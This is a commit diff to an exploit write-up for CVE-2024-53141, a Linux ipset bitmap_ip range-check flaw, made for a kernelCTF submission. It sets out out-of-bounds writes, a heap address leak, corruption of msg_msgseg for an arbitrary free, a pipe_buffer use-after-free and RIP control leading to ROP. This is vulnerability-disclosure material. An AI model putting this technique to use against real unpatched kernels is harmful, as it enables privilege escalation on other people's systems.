Skip to content

Commit 4613ed6

Browse files
authored
Update exploit.md
1 parent 7f1bd92 commit 4613ed6

File tree

1 file changed

+21
-11
lines changed
  • pocs/linux/kernelctf/CVE-2024-53141_lts/docs

1 file changed

+21
-11
lines changed

pocs/linux/kernelctf/CVE-2024-53141_lts/docs/exploit.md

+21-11
Original file line numberDiff line numberDiff line change
@@ -11,39 +11,41 @@ static int
1111
bitmap_ip_uadt(struct ip_set *set, struct nlattr *tb[],
1212
enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
1313
{
14+
if (ip < map->first_ip || ip > map->last_ip) // [1]
15+
return -IPSET_ERR_BITMAP_RANGE;
1416
...
1517
if (tb[IPSET_ATTR_IP_TO]) {
1618
ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP_TO], &ip_to);
1719
if (ret)
1820
return ret;
1921
if (ip > ip_to) {
2022
swap(ip, ip_to);
21-
if (ip < map->first_ip) // [1]
23+
if (ip < map->first_ip) // [2]
2224
return -IPSET_ERR_BITMAP_RANGE;
2325
}
2426
} else if (tb[IPSET_ATTR_CIDR]) {
2527
u8 cidr = nla_get_u8(tb[IPSET_ATTR_CIDR]);
2628
...
27-
ip_set_mask_from_to(ip, ip_to, cidr); // [2]
29+
ip_set_mask_from_to(ip, ip_to, cidr); // [3]
2830
} else {
2931
ip_to = ip;
3032
}
3133

32-
if (ip_to > map->last_ip) // [3]
34+
if (ip_to > map->last_ip) // [4]
3335
return -IPSET_ERR_BITMAP_RANGE;
3436

35-
for (; !before(ip_to, ip); ip += map->hosts) { // [4]
37+
for (; !before(ip_to, ip); ip += map->hosts) { // [5]
3638
e.id = ip_to_id(map, ip);
3739
ret = adtfn(set, &e, &ext, &ext, flags);
3840
```
3941
40-
When `tb[IPSET_ATTR_IP_TO]` is not present but `tb[IPSET_ATTR_CIDR]` exists, `ip` and `ip_to` calculated via `ip_set_mask_from_to` based on `tb[IPSET_ATTR_CIDR]`. It's possible to have `ip` less than the actual `map->first_ip` and there's no check of `ip` after that. Therefore, the loop at [4] can proceed outside range ip that allocated (`map->first_ip` until `map->last_ip`).
42+
When `tb[IPSET_ATTR_IP_TO]` is not present but `tb[IPSET_ATTR_CIDR]` exists, `ip` and `ip_to` calculated via `ip_set_mask_from_to` based on `tb[IPSET_ATTR_CIDR]`. It's possible to have `ip` less than the actual `map->first_ip` and there's no check of `ip` after that.
4143
44+
Consider when we have `map->first_ip` to be `0xffffffcb` and `map->last_ip` be `0xffffffff`, then we pass `IPSET_ATTR_IP` with value `0xffffffff` and `IPSET_ATTR_CIDR` with `3`, the result after [3] will make `ip` equal to `0xe0000000` and `ip_to` equal to `0xffffffff`, it would pass the check at [1], [4] and continue proceed to [5]. Therefore, the loop at [5] can proceed outside range ip that allocated (`map->first_ip` until `map->last_ip`).
4245
4346
# Primitives
44-
## OOB Write to Kernel Heap Leak
4547
46-
`adtfn` will resolve to `bitmap_ip_add` function (defined as `mtype_add` in `net/netfilter/ipset/ip_set_bitmap_gen.h`). It will fetch extension `x` from `map->extensions` with `e.id` as index.
48+
`adtfn` will resolve to `bitmap_ip_add` function (defined as `mtype_add` in `net/netfilter/ipset/ip_set_bitmap_gen.h`, mtype is just macro to `bitmap_ip`). It will fetch extension `x` from `map.extensions` with `e.id` as index.
4749
```c
4850
#define get_ext(set, map, id) ((map)->extensions + ((set)->dsize * (id)))
4951
@@ -57,14 +59,17 @@ mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
5759
int ret = mtype_do_add(e, map, flags, dsize: set->dsize);
5860
```
5961
`e.id` comes from `ip_to_id` from previous function, if we craft such `id` it can lead to out-of-bounds later when that function perform on `x`.
62+
6063
```c
6164
static u32
6265
ip_to_id(const struct bitmap_ip *m, u32 ip)
6366
{
6467
return ((ip & ip_set_hostmask(m->netmask)) - m->first_ip) / m->hosts;
6568
}
6669
```
70+
We also can control the size of map (`bitmap_ip` type) by passing `first_ip` and `last_ip` when we initially create the ip set.
6771
72+
## OOB Write to Kernel Heap Leak
6873
By crafting `e.id` it can lead OOB write, for example when we set the comment in sets, it can spill the kernel heap address in the next chunk because `comment` in `ip_set_init_comment` is outside the range.
6974
```c
7075
static int
@@ -87,7 +92,11 @@ ip_set_init_comment(struct ip_set *set, struct ip_set_comment *comment,
8792
rcu_assign_pointer(comment->c, c);
8893
}
8994
```
90-
This is the path that we used to leak kernel heap addr, by shaping heap to `..[skbuff][bitmap_ip][skbuff][skbuff]..` the OOB write of kernel addr will spilled to the next chunk which is socket buffer. By receiving socket buffer, it can contain kernel heap address so we can use it for the next step exploitation.
95+
This is the path that we used to leak kernel heap addr, by shaping heap to `..[skbuff][bitmap_ip][skbuff][skbuff]..` the OOB write of kernel addr will spilled to the next chunk which is socket buffer.
96+
97+
In our exploit we choose to work on kmalloc-cg-1024 in this step, we allocate `bitmap_ip` and spray socket buffer at kmalloc-cg-1024. `ip_set_init_comment` will spilled kernel heap addr from kmalloc-192 to the socket buffer.
98+
99+
By receiving socket buffer, we can get kernel heap address to use it for the next step exploitation.
91100

92101
## OOB Write Arbitrary Value
93102
Another type of OOB that we can use is OOB write with arbitrary value. This works using set that contain `counter`.
@@ -135,9 +144,10 @@ void free_msg(struct msg_msg *msg)
135144
}
136145
}
137146
```
138-
The victim object (`struct bitmap_ip`) is allocated with `GFP_KERNEL_ACCOUNT` so it's guarantee can reside in the same slab cache with `msg_msgseg` object. So we put `bitmap_ip` right before `msg_msgseg`, then perform OOB write so we can write arbitrary value on `msg_msgseg.next`.
139147

140-
By using arbitrary free, we choose `pipe_buffer` as another victim object because it's familiar for us and easy to plan for the next step of exploit. But the kernel heap leak primitives we had only allocate buffer on generic kernel cache, so we kind of guess a little bit to get `pipe_buffer` address that located in account cache. Basically, from our observation we can calculate `leak_addr ~(0x10000000 - 1)` with `leak_addr` as kernel heap addr leaked from kmalloc-192 chunk, we can guess `pipe_buffer` in confident probability.
148+
In this step choose to work on kmalloc-cg-2048, we allocate `bitmap_ip` and spray `msg_msgseg` at kmalloc-cg-2048. The victim object (`struct bitmap_ip`) is allocated with `GFP_KERNEL_ACCOUNT` so it's guarantee can reside in the same slab cache with `msg_msgseg` object. So we put `bitmap_ip` right before `msg_msgseg`, then perform OOB write so we can write arbitrary value on `msg_msgseg.next`.
149+
150+
By using arbitrary free, we choose `pipe_buffer` as another victim object because it's familiar for us and easy to plan for the next step of exploit. But the kernel heap leak primitives we had only allocate buffer on generic kernel cache (kmalloc-192), so we kind of guess a little bit to get `pipe_buffer` address that located in account cache. Basically, from our observation we can calculate `leak_addr ~(0x10000000 - 1)` with `leak_addr` as kernel heap addr leaked from kmalloc-192 chunk, we can guess `pipe_buffer` in confident probability.
141151

142152
## Use-After-Free to Control RIP
143153
In this step, we already free `pipe_buffer` by arbitrary free. Next, we reclaim victim `pipe_buffer` using socket buffer. We spray socket buffer and hope it placed at same address as `pipe_buffer`. Then, we write to the pipe and it will filled one of our socket buffer with `pipe_buffer` content.
@@ -148,7 +158,7 @@ Controlling RIP, we simply free the that socket buffer and reallocate with new o
148158

149159
# Control RIP to ROP Chain
150160
We reached this code path where we control all fields in `pipe_buffer`.
151-
```
161+
```c
152162
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
153163
struct pipe_buffer *buf)
154164
{

0 commit comments

Comments
 (0)